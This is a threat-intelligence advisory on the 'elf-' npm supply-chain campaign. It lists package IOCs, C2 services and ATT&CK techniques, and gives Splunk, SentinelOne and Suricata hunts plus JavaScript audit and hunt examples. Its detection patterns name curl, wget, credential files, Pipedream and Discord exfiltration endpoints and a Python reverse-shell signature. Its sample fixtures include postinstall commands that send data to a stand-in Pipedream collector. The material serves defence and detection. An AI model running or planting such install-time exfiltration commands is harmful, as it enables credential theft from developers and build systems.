"elf-" Campaign Targeting npm Supply Chain Packages

Targeted Sectors

·         Software development, technology

·         Cloud services

·         Any organization using npm packages in their CI/CD pipelines

Targeted Countries

·         Global

BLUF

A new wave of malicious npm packages, tracked as "elf-", was discovered and quickly reported, designed to steal sensitive system data and authentication credentials from developer environments.

Date of First Reported Activity

·         December 2025 latest wave.

Date of Last Reported Activity Update

·         December 15, 2025

APT Names

·         Not publicly attributed to a specific APT

·         There is speculation that this might be tied to North Korean actors, but that has not been confirmed.

 

Associated Criminal Organization Names

·         None identified at this time.

IOCs

Malicious npm Packages

Naming Pattern

Packages typically follow the schema elf-stats-[adjective]-[noun]-[number].

Specific Examples

·         elf-stats-northbound-wishlist-684

·         elf-stats-mulled-stockpile-411

·         elf-stats-automated-update-123 (Representative of the ~420–1,000 variants detected)

Network & Infrastructure IOCs

C2 Endpoints

Malicious payloads exfiltrate system data (IP addresses, hostnames, DNS settings, and credentials) to:

Pipedream Endpoints

[unique-id].m.pipedream.net (Used for data collection and reverse shells).

Discord Webhooks

Various Discord-controlled endpoints used for automated data logging.

Proxy/Relay IP

91[.]238[.]181[.]250 (Previously associated with similar npm backdoor payloads).

File & Behavioral Indicators

Persistence Mechanisms

Simpler variants execute an overt reverse shell at installation time via postinstall hooks.

Tools Used in Campaign

·         Malicious JavaScript code executed during the preinstall phase of packages.

CVEs and CVSS Vectors

·         None associated

·         This is social engineering/malicious code rather than exploitation of a specific software vulnerability.

Nessus ID

·         This has not been tied to CVEs

Patching

·         No specific patch, as it relies on developer vigilance and secure practices.

Mitigation Data

·         Mitigation involves checking for unknown package updates and rolling/invalidating all credentials (npm tokens, GitHub, AWS, Azure keys) if compromise is suspected.

·         Use automated security tools (like Amazon Inspector or OpenSSF registry) for real-time package scanning.
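One way to operationalise the first mitigation bullet, as an added example that is not from the advisory or any vendor tool: a Node script that audits a root package.json and the manifests of installed packages for the elf-stats naming pattern and for install-time lifecycle scripts that invoke downloaders, interpreters, credential files or the exfiltration services listed above. The sample manifests, the EXAMPLE-ID host and the token list are constructed assumptions.

```javascript
// Added example (not from the advisory): audit npm manifests for the
// "elf-stats-<adjective>-<noun>-<number>" naming pattern and for install-time
// lifecycle scripts that reach for shells, downloaders or the report's C2 services.
const NAME_PATTERN = /^elf-stats-[a-z]+-[a-z]+-\d+$/;
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall"];
// Tokens drawn from the report's IOCs/TTPs (assumed list; extend per environment).
const SUSPICIOUS_TOKENS = [
  "curl ", "wget ", "python", "bash -i", "pipedream.net",
  "discord.com/api/webhooks", ".aws/credentials", ".npmrc",
];
// Findings for one parsed package.json object: name match and/or risky hooks.
function auditManifest(pkg) {
  const findings = [];
  if (NAME_PATTERN.test(pkg.name || "")) {
    findings.push({ package: pkg.name, reason: "name matches elf-stats pattern" });
  }
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = pkg.scripts && pkg.scripts[hook];
    if (!cmd) continue;
    const hits = SUSPICIOUS_TOKENS.filter((t) => cmd.toLowerCase().includes(t));
    if (hits.length) {
      findings.push({ package: pkg.name, reason: `${hook} script uses ${hits.join(", ")}` });
    }
  }
  return findings;
}
// Audit the root manifest's declared dependencies plus every installed
// package.json (one object per node_modules/<name>/package.json).
function auditTree(rootPkg, installedPkgs) {
  const declared = Object.keys(rootPkg.dependencies || {})
    .concat(Object.keys(rootPkg.devDependencies || {}));
  const findings = declared
    .filter((name) => NAME_PATTERN.test(name))
    .map((name) => ({ package: name, reason: "declared dependency matches elf-stats pattern" }));
  for (const pkg of installedPkgs) findings.push(...auditManifest(pkg));
  return findings;
}
// Constructed sample input (not real package contents).
const SAMPLE_ROOT = {
  name: "my-app",
  dependencies: { express: "^4.19.0", "elf-stats-northbound-wishlist-684": "1.0.0" },
};
const SAMPLE_INSTALLED = [
  { name: "express", version: "4.19.2", scripts: {} },
  { name: "elf-stats-northbound-wishlist-684", version: "1.0.0",
    scripts: { postinstall: "node setup.js && curl -s https://EXAMPLE-ID.m.pipedream.net" } },
];
console.log(JSON.stringify(auditTree(SAMPLE_ROOT, SAMPLE_INSTALLED), null, 2));
```

Feed it the parsed root package.json and the package.json of each directory under node_modules; any finding on a build host warrants the credential rotation described above.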

Malware Names

elf-stats-northbound-wishlist-684

Malware Samples

sha256

844013025bf7c5d01e6f48df0e990103ad3c333be31f54cf5301e1463f6ca441

URL Link to sample

·         hxxps://www.virustotal.com/gui/file/844013025bf7c5d01e6f48df0e990103ad3c333be31f54cf5301e1463f6ca441

TTPs

Initial Access

·         T1195.001: Supply Chain Compromise: Compromise Software Dependencies and Development Tools

o   Mass-publishing hundreds of malicious npm packages (e.g., elf-stats-northbound-wishlist-684) to be inadvertently integrated into developer projects or CI/CD workflows

Execution

·         T1059.004: Command and Scripting Interpreter: Unix Shell

o   Using malicious postinstall scripts within the package.json file to automatically execute commands upon package installation (npm install)

·         T1059.006: Command and Scripting Interpreter: Python

o   Utilizing Python-based one-liners to establish reverse shells on compromised systems

Persistence

·         T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

o   (Observed in Windows-targeted variants) adding entries to startup folders to maintain access across reboots

Discovery

·         T1082: System Information Discovery

o   Automated gathering of hostnames, IP addresses, network interfaces, and DNS configurations.

·         T1087.001: Account Discovery: Local Account

o   Scanning for local developer usernames and system profiles.

·         T1552.001: Unsecured Credentials: Credentials In Files

o   Searching for sensitive environment variables, .aws/credentials, and .npmrc files containing authentication tokens.

Command and Control (C2)

·         T1105: Ingress Tool Transfer

o   Downloading secondary payloads or reverse shell scripts from external repositories post-infection.

·         T1071.001: Application Layer Protocol: Web Protocols

o   Exfiltrating stolen data to legitimate service endpoints like Pipedream (*.m.pipedream.net) and Discord Webhooks to blend with normal traffic.

·         T1090: Proxy

o   Using proxy servers to mask the attacker's true IP address during data exfiltration

Exfiltration

·         T1041: Exfiltration Over C2 Channel

o   Packaging system metadata and stolen credentials into HTTP POST requests sent directly to attacker-controlled collector endpoints.

Suggested Rules / Potential Hunts

As a reminder, these are indicator-based rules and are likely to be noisy.

Suggested Splunk Hunts

NPM post-install execution

SPL:

index=os_logs sourcetype=sysmon EVENT_ID=1
| eval process_name=lower(process_name), parent_process_name=lower(parent_process_name)
| where parent_process_name IN ("node.exe", "npm", "node")
  AND process_name IN ("cmd.exe", "powershell.exe", "sh", "bash", "python", "python3")
| search process_command IN ("*elf-stats*", "*curl*", "*wget*", "*pipedream*", "*discord.com*")
| stats count by host, user, process_command, parent_process_command
| rename process_command as "Detected_Payload"
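The same parent/child hunt expressed as runnable logic, as an added example that is not from the advisory: it applies the node/npm-to-shell filter and command-line markers from the SPL query above to a handful of constructed Sysmon-style process-creation events, so the matching can be checked offline before it is deployed. It goes slightly beyond the query by also matching python.exe; the hosts, users and EXAMPLE-ID endpoint are made up.

```javascript
// Added example (not from the advisory): the parent/child hunt from the SPL
// query above, run offline against constructed Sysmon-style process-creation
// events. It also matches "python.exe", which the query's child list omits.
const NPM_PARENTS = new Set(["node.exe", "npm", "node"]);
const SHELL_CHILDREN = new Set([
  "cmd.exe", "powershell.exe", "sh", "bash", "python", "python3", "python.exe",
]);
const PAYLOAD_MARKERS = ["elf-stats", "curl", "wget", "pipedream", "discord.com"];

// Image name without its directory, lower-cased: "C:\nodejs\node.exe" -> "node.exe".
function baseName(image) {
  return (image || "").split(/[\\\/]/).pop().toLowerCase();
}

// Events where node/npm spawned a shell or interpreter whose command line
// references the campaign's package names, downloaders or C2 services.
function huntNpmInstallSpawns(events) {
  return events
    .filter((e) => {
      if (!NPM_PARENTS.has(baseName(e.ParentImage))) return false;
      if (!SHELL_CHILDREN.has(baseName(e.Image))) return false;
      const cmd = (e.CommandLine || "").toLowerCase();
      return PAYLOAD_MARKERS.some((m) => cmd.includes(m));
    })
    .map((e) => ({ host: e.Computer, user: e.User,
                   parent: e.ParentCommandLine, payload: e.CommandLine }));
}

// Constructed sample events using Sysmon Event ID 1 field names; values are made up.
const SAMPLE_EVENTS = [
  // benign: npm lifecycle script running the TypeScript compiler
  { Computer: "build-01", User: "ci", ParentImage: "/usr/bin/node", Image: "/bin/sh",
    ParentCommandLine: "npm install", CommandLine: "sh -c tsc -p ." },
  // suspicious: install script posting to a Pipedream collector
  { Computer: "build-01", User: "ci", ParentImage: "/usr/bin/node", Image: "/bin/sh",
    ParentCommandLine: "npm install",
    CommandLine: "sh -c curl -s -X POST https://EXAMPLE-ID.m.pipedream.net" },
  // suspicious: Windows node.exe launching python on an elf-stats helper
  { Computer: "dev-07", User: "alice", ParentImage: "C:\\Program Files\\nodejs\\node.exe",
    Image: "C:\\Python311\\python.exe", ParentCommandLine: "npm install",
    CommandLine: "python.exe C:\\Temp\\elf-stats-mulled-stockpile-411\\setup.py" },
  // not matched: same endpoint, but the parent is an interactive shell, not npm/node
  { Computer: "dev-07", User: "alice", ParentImage: "/bin/bash", Image: "/usr/bin/curl",
    ParentCommandLine: "bash", CommandLine: "curl https://EXAMPLE-ID.m.pipedream.net" },
];
console.log(huntNpmInstallSpawns(SAMPLE_EVENTS));
```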

Suggested SentinelOne Rules

 

SentinelOne (S1) Query (EDR/XDR)

Hunt Focus: Look for the "Unsigned Code" or "Suspicious Parent-Child Relationship" alerts specifically involving node spawning python or bash with a network connection

 

Query (STAR Format):

(ParentProcessName == "node.exe" OR ParentProcessName == "npm")
AND (
    Commandline Contains "elf-stats"
    OR Commandline Contains ".aws/credentials"
    OR Commandline Contains ".npmrc"
    OR Commandline Contains "env"
)
AND (
    Indicator == "Reverse Shell"
    OR Indicator == "Suspicious Script Execution"
)

Suggested Suricata Rules

Detect Pipedream Exfiltration

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"ET MALWARE npm elf-stats Campaign Exfiltration (Pipedream)"; flow:established,to_server; content:"POST"; http_method; content:".m.pipedream.net"; http_host; content:"elf-stats"; http_client_body; reference:url,socket.dev/blog/60-malicious-npm-packages-leak-network-and-host-data; classtype:trojan-activity; sid:20251201; rev:1;)

 

Detect Reverse Shell Activity via Python (Common in elf-stats)

alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET ATTACK_RESPONSE Python Reverse Shell (elf-stats)"; flow:established,from_server; content:"Python"; pcre:"/import\s+socket,os,pty/"; reference:url,cisa.gov/news-events/analysis-reports; classtype:bad-unknown; sid:20251202; rev:1;)

 

Delivery Method

·         Compromised maintainer accounts or social engineering to publish malicious packages to the public NPM registry.

Email Samples

Campaign Delivery Mechanism

Research as of December 2025 indicates that the "elf-" campaign does not primarily utilize a specific "phishing email" for delivery. Instead, it employs the following methods:

·         Automated Mass-Publishing: Approximately 1,000 unique packages were published at a rate of one every two minutes from disposable accounts.

·         Search Engine/Registry Poisoning: By flooding the npm registry with hundreds of packages containing keywords like "stats," "automated-update," or "northbound," the actors hope developers will inadvertently include these "helper" libraries in their package.json dependencies.

·         Dependency Confusion: Some packages target specific internal naming conventions of corporate DevOps environments to be pulled in during automated build processes.

Contextual Email Indicators (Attacker Accounts)

While victims may not receive a direct email, the threat actors used specific email patterns to register their malicious npm accounts. Indicators from the December 2025 wave and similar concurrent campaigns include:

·         Throwaway Naming: Accounts created minutes before publication with no linked GitHub or repository history.

·         Pattern-Based Registration Emails: Similar campaigns in 2025 used incrementally numbered Gmail accounts for registration (e.g., npm9960+1@gmail.com, npm9960+2@gmail.com).

Comparison: The "Contagious Interview" Lure

It is important to distinguish the automated "elf-" campaign from the "Contagious Interview" campaign (attributed to North Korean actors), which does use direct email and LinkedIn lures.

·         Lure Style: Fake job offers or technical coding assessments.

·         Example Email Themes: "Senior AI and DevOps Engineer" roles or "Technical screening invitation".

·         Payload Delivery: These emails contain links to repositories that require the user to run npm install, which then executes malicious packages similar to the "elf-" variants.

Summary for Defenders: You are more likely to find the "elf-" campaign in your CI/CD logs or dependency manifests than in your email inbox. Any outgoing traffic to *.m.pipedream.net or Discord webhooks originating from a build server should be treated as a high-priority incident.

 

References

Open Source Malware

hxxps://opensourcemalware.com/blog/elf-stats-spam-campaign

X

hxxps://x.com/pollyplummer/status/1996250889523249396

AWS News

hxxps://aws-news.com/article/2025-12-15-what-aws-security-learned-from-responding-to-recent-npm-supply-chain-threat-campaigns

Wiz IO

hxxps://www.wiz.io/blog/shai-hulud-2-0-ongoing-supply-chain-attack

Socket Dev

hxxps://socket.dev/blog/elves-on-npm

CheckMarx

hxxps://checkmarx.com/zero-post/npm-hit-by-shai-hulud-the-self-replicating-supply-chain-attack

Amazon Web Services

hxxps://aws.amazon.com/blogs/security/what-aws-security-learned-from-responding-to-recent-npm-supply-chain-threat-campaigns

VirusTotal

hxxps://www.virustotal.com/gui/file/844013025bf7c5d01e6f48df0e990103ad3c333be31f54cf5301e1463f6ca441
